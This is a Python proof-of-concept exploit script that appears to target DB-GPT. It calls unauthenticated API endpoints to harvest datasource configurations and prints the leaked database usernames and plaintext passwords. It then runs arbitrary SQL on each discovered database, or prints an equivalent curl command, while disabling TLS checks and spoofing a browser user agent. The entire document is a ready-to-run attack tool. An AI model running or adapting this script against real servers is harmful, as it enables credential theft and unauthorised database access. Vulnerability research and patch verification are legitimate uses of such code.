import requests import json import urllib3 import argparse import sys urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def banner(): print(r""" ____ ____ ________ ____ ______ ____ ____ ______ / __ \/ __ )/ ____/ |/ / |/ / _/ / __ \/ __ \/ ____/ / / / / __ / / __/ /|_/ / /|_/ // / / /_/ / / / / / / /_/ / /_/ / /_/ / / / / / / // / / ____/ /_/ / /___ /_____/_____/\____/_/ /_/_/ /_/___/ /_/ \____/\____/ [+] DBGPT Unauthenticated Information Disclosure & SQL Execution PoC """) # DB Type to Version Query Mapping DB_QUERIES = { "mysql": "SELECT VERSION();", "postgresql": "SELECT version();", "postgres": "SELECT version();", "sqlite": "SELECT sqlite_version();", "oracle": "SELECT banner FROM v$version WHERE ROWNUM = 1;", "mssql": "SELECT @@VERSION;", "sqlserver": "SELECT @@VERSION;", "dm": "SELECT * FROM v$version;", # Dameng DB "kingbase": "SELECT version();", # Kingbase } def get_smart_sql(db_type, default_sql): """ Select appropriate SQL query based on database type if user didn't specify a custom one. """ if not db_type: return default_sql db_type = db_type.lower() # If the default SQL is generic (SELECT VERSION()), try to find a specific one if "select version()" in default_sql.lower(): for key, query in DB_QUERIES.items(): if key in db_type: return query return default_sql def get_datasources(base_url): """ Attempt to retrieve database credentials from known endpoints. """ endpoints = [ "/api/v2/serve/datasources", "/api/v1/chat/db/list", "/api/v1/editor/db/list" # Sometimes this exists too ] found_dbs = [] for endpoint in endpoints: target_url = base_url.rstrip("/") + endpoint print(f"[*] Trying to fetch datasources from: {target_url}") try: response = requests.get(target_url, verify=False, timeout=10) if response.status_code == 200: try: data = response.json() # Check if success is true if data.get("success") is True: db_list = data.get("data", []) if db_list: print(f"[+] SUCCESS! Found {len(db_list)} database configurations at {endpoint}") for db in db_list: # Extract key info # Handle different JSON structures if "params" in db: params = db.get("params", {}) db_info = { "id": db.get("id"), "type": db.get("type"), "name": params.get("database") or db.get("db_name"), "user": params.get("user"), "password": params.get("password"), "host": params.get("host"), "port": params.get("port"), "driver": params.get("driver") } else: # Structure for /api/v1/chat/db/list (alternative format) db_info = { "id": db.get("id"), "type": db.get("db_type"), "name": db.get("db_name"), "user": db.get("db_user"), "password": db.get("db_pwd"), "host": db.get("db_host"), "port": db.get("db_port"), "driver": db.get("db_type") } found_dbs.append(db_info) # If we found data, we can stop trying other endpoints or continue to gather more # Let's return what we found from this working endpoint return found_dbs else: print(f"[-] Endpoint {endpoint} returned success but no data.") else: print(f"[-] Endpoint {endpoint} returned success=false.") except json.JSONDecodeError: print(f"[-] Endpoint {endpoint} did not return valid JSON.") else: print(f"[-] Endpoint {endpoint} returned status code: {response.status_code}") except Exception as e: print(f"[!] Error connecting to {target_url}: {e}") return found_dbs def run_sql(base_url, db_name, sql_query, generate_curl=False): """ Execute SQL query using various endpoints to bypass potential server-side bugs. """ # If generating curl, we just use the first standard endpoint and exit if generate_curl: target_url = base_url.rstrip("/") + "/api/v1/editor/chart/run" payload = { "db_name": db_name, "chart_type": "bar", "sql": sql_query } # Compact JSON for curl json_payload = json.dumps(payload) # Format for Windows/PowerShell friendliness print("\n[+] Generated cURL command:") print(f'curl -X POST "{target_url}" -H "Content-Type: application/json" -d \'{json_payload}\'') return True endpoints = [ "/api/v1/editor/chart/run", # Standard endpoint "/api/v1/sql/exec", # Alternative "/api/v1/editor/db/run", # Another possibility "/api/v2/serve/query" # v2 API attempt ] headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" } print(f"\n[*] Executing SQL on database '{db_name}': {sql_query}") # Try different endpoints for endpoint in endpoints: target_url = base_url.rstrip("/") + endpoint # print(f"[*] Trying endpoint: {endpoint}") # Try different payloads if the first one fails payloads = [ # Standard payload { "db_name": db_name, "chart_type": "bar", "sql": sql_query }, # Payload with dummy chart info (sometimes required) { "db_name": db_name, "chart_type": "bar", "sql": sql_query, "chart_name": "test_chart", "chart_desc": "test_desc" }, # Simplified payload for raw SQL execution endpoints { "db_name": db_name, "sql": sql_query } ] for i, payload in enumerate(payloads): try: # specific handling for different endpoints might be needed, but generic payloads cover most cases response = requests.post(target_url, json=payload, headers=headers, verify=False, timeout=15) if response.status_code == 200: try: data = response.json() if data.get("success") is True: # Handle different response structures sql_data = data.get("data", {}) # Sometimes data is directly in 'data', sometimes in 'data.sql_data' if "sql_data" in sql_data: sql_data = sql_data.get("sql_data", {}) columns = sql_data.get("colunms", []) or sql_data.get("columns", []) # Handle typo in API response 'colunms' values = sql_data.get("values", []) print(f"[+] SQL Execution Successful! (Endpoint: {endpoint})") if columns: print(f" Columns: {columns}") if values: print(" Results:") for row in values: print(f" {row}") else: print(" (No rows returned)") return True else: err_msg = data.get('err_msg', '') # Only print error if it's the last attempt or a significant error if "unexpected keyword argument 'params'" in err_msg: print(f"[-] Server Error at {endpoint}: Backend code bug (unexpected 'params'). This is common in some DBGPT versions with PostgreSQL.") elif i == len(payloads) - 1: print(f"[-] SQL Execution Failed at {endpoint}. Message: {err_msg}") except json.JSONDecodeError: pass # create noise only if all fail elif response.status_code == 404: pass # Endpoint doesn't exist, try next else: pass # Other errors, try next except Exception as e: pass # Network errors, try next print("[-] All SQL execution attempts failed.") return False def main(): banner() examples = """ Examples: # Basic check for DB info and version python dbgpt_poc.py -u https://dbgpt.example.com # Execute custom SQL python dbgpt_poc.py -u https://dbgpt.example.com --sql "SELECT user();" # Specify a database name if auto-detection fails python dbgpt_poc.py -u https://dbgpt.example.com --db "target_db" --sql "SHOW TABLES;" """ parser = argparse.ArgumentParser( description="DBGPT Vulnerability PoC", epilog=examples, formatter_class=argparse.RawDescriptionHelpFormatter ) parser.add_argument("-u", "--url", required=True, help="Target URL (e.g., https://dbgpt.example.com)") parser.add_argument("-s", "--sql", default="SELECT VERSION();", help="SQL query to execute (default: SELECT VERSION())") parser.add_argument("--db", help="Specific database name to use for SQL execution (optional, otherwise uses discovered DBs)") parser.add_argument("--curl", action="store_true", help="Generate cURL command instead of executing SQL") args = parser.parse_args() # 1. Get Datasources / Leak Info print("--- [ Phase 1: Information Disclosure ] ---") dbs = get_datasources(args.url) valid_db_names = [] if dbs: print(f"\n[+] Found {len(dbs)} Database Configurations:") for i, db in enumerate(dbs): print(f"\n [{i+1}] Database ID: {db['id']}") print(f" Name : {db['name']}") print(f" Type : {db['type']}") print(f" Host : {db['host']}") print(f" Port : {db['port']}") print(f" User : {db['user']}") print(f" Password : {db['password']}") # Leaked credential if db['name']: valid_db_names.append(db['name']) else: print("[-] No datasources found. Authentication might be required or endpoints patched.") # 2. SQL Execution print("\n--- [ Phase 2: SQL Execution ] ---") targets = [] # Prioritize user-provided DB if args.db: print(f"[*] Using manually specified database: {args.db}") targets.append({"name": args.db, "type": "unknown"}) # We don't know type if manually specified # If no manual DB, use discovered ones elif dbs: print(f"[*] Using discovered databases for SQL execution...") targets = dbs # Use all found DBs, not just names, to get their types if not targets: print("[-] No database targets available for SQL execution.") print(" Tips: Use --db to manually specify a target if Information Disclosure failed.") return # Execute SQL on each target for target in targets: db_name = target['name'] db_type = target.get('type') if not db_name: # Handle case where name is None/Empty print(f"[-] Skipping target with empty name (ID: {target.get('id')})") continue # Determine best SQL query # If user provided a specific custom SQL (not default), use it. # Otherwise, try to adapt based on DB type. sql_to_run = get_smart_sql(db_type, args.sql) if not args.curl: print(f"\n[+] Target: {db_name} (Type: {db_type})") if sql_to_run != args.sql: print(f" -> Adapted SQL for {db_type}: {sql_to_run}") run_sql(args.url, db_name, sql_to_run, generate_curl=args.curl) if __name__ == "__main__": main()